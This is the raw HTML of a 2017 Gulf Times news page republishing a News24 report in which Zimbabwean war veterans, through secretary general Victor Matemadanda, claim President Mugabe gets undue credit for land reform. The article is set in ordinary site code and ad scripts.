        <div class="td-crumb-container"><div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://www.gulftimes.com/"><span itemprop="title">Home</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in International" class="entry-crumb" itemprop="url" href="http://www.gulftimes.com/international/"><span itemprop="title">International</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Africa" class="entry-crumb" itemprop="url" href="http://www.gulftimes.com/international/africa/"><span itemprop="title">Africa</span></a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim"><meta itemprop="url" content = "http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/">Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-33963" class="post-33963 post type-post status-publish format-standard has-post-thumbnail hentry category-africa" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://www.gulftimes.com/international/">International</a></li><li class="entry-category"><a  href="http://www.gulftimes.com/international/africa/">Africa</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/">Gulf Times</a> - </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-08-04T15:04:51+00:00" >August 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-post-comments"><a href="http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-33963">5</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Zimbabwe%3A+Land+Reform+%E2%80%93+Mugabe+%26%23039%3BGetting+Undue+Credit%26%23039%3B%2C+War+Vets+Claim&url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&via=Gulf+Times"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/&amp;media=http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            </div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" data-caption=""><img width="640" height="392" itemprop="image" class="entry-thumb td-modal-image" src="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" alt="" title="00421134b86ee65e8b25c74bfd710613d325dc67arc614x376w1200.png"/></a></div>
        <div class="td-a-rec td-a-rec-id-content_top "><div class="td-all-devices"><a href="http://www.jobs24.com/en/"><img src="http://www.gulftimes.com/wp-content/uploads/2016/02/jobs24.2.jpg"/></a></div></div><p> <br />

<div readability="80.625346901">
<div class="figure picture inset left" readability="6">
                <img src="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w285:us1.png" width="285" height="175" title="" alt="" /><span class="credit right">Photo:                   The Herald                </span>
<p>
                  President Robert Mugabe and First Lady Grace Mugabe.                 </p>
</p></div>

 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inline">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-5028494402781052" data-ad-slot="2073866724"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p class="story-body-text" data-para-word-count="36">Zimbabwean war veterans have reportedly claimed that President Robert Mugabe is improperly getting credit for the controversial land reform programme, adding that the veteran leader had &#8220;no land reform policy&#8221; during the height of the reforms.</p>
<p class="story-body-text" data-para-word-count="29">Thousands of white commercial farmers and their employees were displaced and left without sources of income during the fast-tracked agrarian reforms that were masterminded by Mugabe&#8217;s administration in 2000.</p>
<p class="story-body-text" data-para-word-count="20">According to the Zimbabwe Commercial Farmers Union, more than 4000 white farmers were affected by the often violent farm invasions.</p>
<p class="story-body-text" data-para-word-count="29">Some of the white farmers that were kicked out of their properties during the agrarian reforms have now set base in neighbouring countries such as Malawi, Mozambique and Zambia.</p>
<p class="story-body-text" data-para-word-count="45">According to New Zimbabwe.com, the Zimbabwe National Liberation War Veteran Association Secretary General, Victor Matemadanda, said that the ex-freedom fighters played a crucial role in the southern African country&#8217;s land reform programme. But, he said, they had since become victims of the land reform exercise.</p>
<p><!--/.outer-ad-container.responsive-aans-view-a-container--></p>
<p class="story-body-text" data-para-word-count="5">&#8216;Smith killed some of us&#8217;</p>
<p class="story-body-text" data-para-word-count="27">Matemadanda alleged that Mugabe was quiet about the land reforms until the former liberation fighters &#8220;took matters into their own hands&#8221; and invaded white owned commercial farms.</p>
<p class="story-body-text" data-para-word-count="26">He said that prior to the wide spread farm invasions, the former freedom fighters were met with police brutality at the behest of the veteran leader.</p>
<p class="story-body-text" data-para-word-count="68">&#8220;Smith killed some of us because of the land issue. Mugabe chased us when we invaded the farms earlier and when some of us got the small pieces of land, Mugabe chased us again with offer letters. Look at what happened in 2000, the veterans of the Chimurenga struggle were met with police brutality sent by Mugabe and chased away from the farms,&#8221; Matemadanda was quoted as saying.</p>
<p class="story-body-text" data-para-word-count="36">He said that war veterans who occupied the white owned farms at the height of the land reforms were now landless, as they were being chased away by Mugabe&#8217;s government as well the First Lady Grace.</p>
<p class="story-body-text" data-para-word-count="12">Reports last year indicated that the Mugabes owned at least fourteen farms.</p>
<p class="story-body-text" data-para-word-count="1"><strong>News24</strong></p>
</div>
<p><br />
<br /><a href="http://allafrica.com/stories/201708040796.html">Source link </a></p>
<span class="et_social_bottom_trigger"></span><div class="td-a-rec td-a-rec-id-content_bottom "><div class="td-all-devices"><a href="http://uniquecosmetics.com"><img src="http://www.gulftimes.com/wp-content/uploads/2015/12/728x90.jpg"/></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Zimbabwe%3A+Land+Reform+%E2%80%93+Mugabe+%26%23039%3BGetting+Undue+Credit%26%23039%3B%2C+War+Vets+Claim&url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&via=Gulf+Times"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/&amp;media=http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/" data-text="Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://www.gulftimes.com/2017/08/04/why-aluminum-giant-alcoas-stock-jumped-11-5-in-july/">Why Aluminum Giant Alcoa&#039;s Stock Jumped 11.5% in July</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://www.gulftimes.com/2017/08/04/lexi-thompson-gets-it-half-right-takes-share-of-the-lead/">Lexi Thompson gets it half right, takes share of the lead</a></div></div></div>            <div class="author-box-wrap"><a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/"><img alt='' src='http://0.gravatar.com/avatar/6bd0fd811df1df0e2fe2ab0bbb27aa69?s=96&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/6bd0fd811df1df0e2fe2ab0bbb27aa69?s=192&amp;d=mm&amp;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/">Gulf Times</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-08-04T15:04:51+00:00"><meta itemprop="headline " content="Zimbabwe: Land Reform - Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/00421134:b86ee65e8b25c74bfd710613d325dc67:arc614x376:w1200.png"><meta itemprop="interactionCount" content="UserComments:0"/>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_5984928ec240f = new tdBlock();
block_td_uid_1_5984928ec240f.id = "td_uid_1_5984928ec240f";
block_td_uid_1_5984928ec240f.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_block_id_3518534721 td_uid_1_5984928ec240f_rand","td_column_number":3,"live_filter_cur_post_id":33963,"live_filter_cur_post_author":"1"}';
block_td_uid_1_5984928ec240f.td_column_number = "3";
block_td_uid_1_5984928ec240f.block_type = "td_block_related_posts";
block_td_uid_1_5984928ec240f.post_count = "3";
block_td_uid_1_5984928ec240f.found_posts = "242";
block_td_uid_1_5984928ec240f.header_color = "";
block_td_uid_1_5984928ec240f.ajax_pagination_infinite_stop = "";
block_td_uid_1_5984928ec240f.max_num_pages = "81";
tdBlocksArray.push(block_td_uid_1_5984928ec240f);
</script><div class="td_block_wrap td_block_related_posts td_block_id_3518534721 td_uid_1_5984928ec240f_rand td_with_ajax_pagination td-pb-border-top"><h4 class="td-related-title"><a id="td_uid_2_5984928ec3a33" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_5984928ec240f" href="#">RELATED ARTICLES</a><a id="td_uid_3_5984928ec3a70" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_5984928ec240f" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_5984928ec240f class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/08/03/tanzania-bogus-landlord-on-the-prowl-says-housing-minister/" rel="bookmark" title="Tanzania: Bogus Landlord On the Prowl, Says Housing Minister"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/08/00421309:5dba4f2aa0035253b57947df169353d2:arc614x376:w1200-218x150.png" alt="" title="Tanzania: Bogus Landlord On the Prowl, Says Housing Minister"/></a></div>                <a href="http://www.gulftimes.com/international/africa/" class="td-post-category">Africa</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/08/03/tanzania-bogus-landlord-on-the-prowl-says-housing-minister/" rel="bookmark" title="Tanzania: Bogus Landlord On the Prowl, Says Housing Minister">Tanzania: Bogus Landlord On the Prowl, Says Housing Minister</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/08/02/malawi-joyce-banda-supporters-pp-argue-arrest-warrant-is-politically-motivated/" rel="bookmark" title="Malawi: Joyce Banda Supporters, PP Argue Arrest Warrant Is &#039;Politically Motivated&#039;"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/08/00220292:304027a93396c2c8cab3592b91994f40:arc614x376:w1200-218x150.png" alt="" title="Malawi: Joyce Banda Supporters, PP Argue Arrest Warrant Is &#039;Politically Motivated&#039;"/></a></div>                <a href="http://www.gulftimes.com/international/africa/" class="td-post-category">Africa</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/08/02/malawi-joyce-banda-supporters-pp-argue-arrest-warrant-is-politically-motivated/" rel="bookmark" title="Malawi: Joyce Banda Supporters, PP Argue Arrest Warrant Is &#039;Politically Motivated&#039;">Malawi: Joyce Banda Supporters, PP Argue Arrest Warrant Is &#039;Politically Motivated&#039;</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/07/31/liberia-soil-scientist-calls-for-digital-soil-map/" rel="bookmark" title="Liberia: Soil Scientist Calls for Digital Soil Map"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/07/00370938:0ba6885b920a2c4685ff2738ede359df:arc614x376:w1200-218x150.png" alt="" title="Liberia: Soil Scientist Calls for Digital Soil Map"/></a></div>                <a href="http://www.gulftimes.com/international/africa/" class="td-post-category">Africa</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/07/31/liberia-soil-scientist-calls-for-digital-soil-map/" rel="bookmark" title="Liberia: Soil Scientist Calls for Digital Soil Map">Liberia: Soil Scientist Calls for Digital Soil Map</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5984928ec240f" data-td_block_id="td_uid_1_5984928ec240f"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5984928ec240f" data-td_block_id="td_uid_1_5984928ec240f"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
        
            <div class="td-comments-title-wrap ">
                <h4 class="block-title"><span>NO COMMENTS</span></h4>
            </div>

            				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/#respond" style="display:none;">Cancel reply</a></small></h3>				<form action="http://www.gulftimes.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<div class="clearfix"></div>
				<p class="comment-form-input-wrap">
					<textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
		        </p><p class="comment-form-input-wrap">
			            <span class="comment-req-wrap">
			            	<input class="" id="author" name="author" placeholder="Name:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <span class="comment-req-wrap"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='33963' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>				</form>
					</div><!-- #respond -->
		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td-a-rec td-a-rec-id-sidebar  td-rec-hide-on-tl td-rec-hide-on-tp td-rec-hide-on-p"><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="http://www.coffee.net" target="_blank"><img src="http://www.gulftimes.com/wp-content/uploads/2016/11/great-coffee-e1480251697673.jpg"/></a></div>
</div><script>var block_td_uid_4_5984928ec6fd9 = new tdBlock();
block_td_uid_4_5984928ec6fd9.id = "td_uid_4_5984928ec6fd9";
block_td_uid_4_5984928ec6fd9.atts = '{"sort":"random_posts","custom_title":"MOST POPULAR","limit":"4","header_color":"","ajax_pagination":"load_more","class":"td_block_widget td_block_id_2485290397 td_uid_4_5984928ec6fd9_rand"}';
block_td_uid_4_5984928ec6fd9.td_column_number = "1";
block_td_uid_4_5984928ec6fd9.block_type = "td_block_7";
block_td_uid_4_5984928ec6fd9.post_count = "4";
block_td_uid_4_5984928ec6fd9.found_posts = "3911";
block_td_uid_4_5984928ec6fd9.header_color = "";
block_td_uid_4_5984928ec6fd9.ajax_pagination_infinite_stop = "";
block_td_uid_4_5984928ec6fd9.max_num_pages = "978";
tdBlocksArray.push(block_td_uid_4_5984928ec6fd9);
</script><div class="td_block_wrap td_block_7 td_block_widget td_block_id_2485290397 td_uid_4_5984928ec6fd9_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>MOST POPULAR</span></h4><div id=td_uid_4_5984928ec6fd9 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/12/22/hyg-etf-inflow-alert/" rel="bookmark" title="HYG: ETF Inflow Alert"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/dreamit-100x70.jpg" alt="" title="HYG: ETF Inflow Alert"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/12/22/hyg-etf-inflow-alert/" rel="bookmark" title="HYG: ETF Inflow Alert">HYG: ETF Inflow Alert</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-12-22T16:41:00+00:00" >December 22, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-12-22T16:41:00+00:00"><meta itemprop="headline " content="HYG: ETF Inflow Alert"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/dreamit.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/04/14/dubai-to-offer-500k-to-start-ups-at-dragons-den-type-event/" rel="bookmark" title="Dubai to offer $500k to start-ups at &#039;Dragons Den&#039; type event"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/04/dragons_den-100x70.jpg" alt="" title="Dubai to offer $500k to start-ups at &#039;Dragons Den&#039; type event"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/04/14/dubai-to-offer-500k-to-start-ups-at-dragons-den-type-event/" rel="bookmark" title="Dubai to offer $500k to start-ups at &#039;Dragons Den&#039; type event">Dubai to offer $500k to start-ups at &#039;Dragons Den&#039; type event</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-04-14T11:27:17+00:00" >April 14, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-04-14T11:27:17+00:00"><meta itemprop="headline " content="Dubai to offer $500k to start-ups at &#039;Dragons Den&#039; type event"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/04/dragons_den.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/07/31/gregg-williams-is-turning-around-the-browns-one-bleeping-up-down-at-a-time/" rel="bookmark" title="Gregg Williams is turning around the Browns, one (bleeping) up-down at a time"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/07/gregg-williams-100x70.jpg" alt="" title="Gregg Williams is turning around the Browns, one (bleeping) up-down at a time"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/07/31/gregg-williams-is-turning-around-the-browns-one-bleeping-up-down-at-a-time/" rel="bookmark" title="Gregg Williams is turning around the Browns, one (bleeping) up-down at a time">Gregg Williams is turning around the Browns, one (bleeping) up-down at...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-07-31T21:11:40+00:00" >July 31, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-07-31T21:11:40+00:00"><meta itemprop="headline " content="Gregg Williams is turning around the Browns, one (bleeping) up-down at a time"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/07/gregg-williams.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/26/greenland-rising-temperatures-risk-releasing-atomic-waste-from-cold-war-us-base/" rel="bookmark" title="Greenland: rising temperatures risk releasing atomic waste from Cold War US base"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/1000x563_345023-100x70.jpg" alt="" title="Greenland: rising temperatures risk releasing atomic waste from Cold War US base"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/26/greenland-rising-temperatures-risk-releasing-atomic-waste-from-cold-war-us-base/" rel="bookmark" title="Greenland: rising temperatures risk releasing atomic waste from Cold War US base">Greenland: rising temperatures risk releasing atomic waste from Cold War US...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-26T19:27:55+00:00" >September 26, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-26T19:27:55+00:00"><meta itemprop="headline " content="Greenland: rising temperatures risk releasing atomic waste from Cold War US base"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/1000x563_345023.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" id="next-page-td_uid_4_5984928ec6fd9" data-td_block_id="td_uid_4_5984928ec6fd9">Load more<i class="td-icon-font td-icon-menu-down"></i></a></div></div> <!-- ./block --><script>var block_td_uid_5_5984928ecc6b2 = new tdBlock();
block_td_uid_5_5984928ecc6b2.id = "td_uid_5_5984928ecc6b2";
block_td_uid_5_5984928ecc6b2.atts = '{"sort":"random_posts","custom_title":"HOT NEWS","limit":"4","header_color":"","ajax_pagination":"next_prev","class":"td_block_widget td_block_id_995490248 td_uid_5_5984928ecc6b2_rand"}';
block_td_uid_5_5984928ecc6b2.td_column_number = "1";
block_td_uid_5_5984928ecc6b2.block_type = "td_block_15";
block_td_uid_5_5984928ecc6b2.post_count = "4";
block_td_uid_5_5984928ecc6b2.found_posts = "3911";
block_td_uid_5_5984928ecc6b2.header_color = "";
block_td_uid_5_5984928ecc6b2.ajax_pagination_infinite_stop = "";
block_td_uid_5_5984928ecc6b2.max_num_pages = "978";
tdBlocksArray.push(block_td_uid_5_5984928ecc6b2);
</script><div class="td_block_wrap td_block_15 td_block_widget td_block_id_995490248 td_uid_5_5984928ecc6b2_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>HOT NEWS</span></h4><div id=td_uid_5_5984928ecc6b2 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
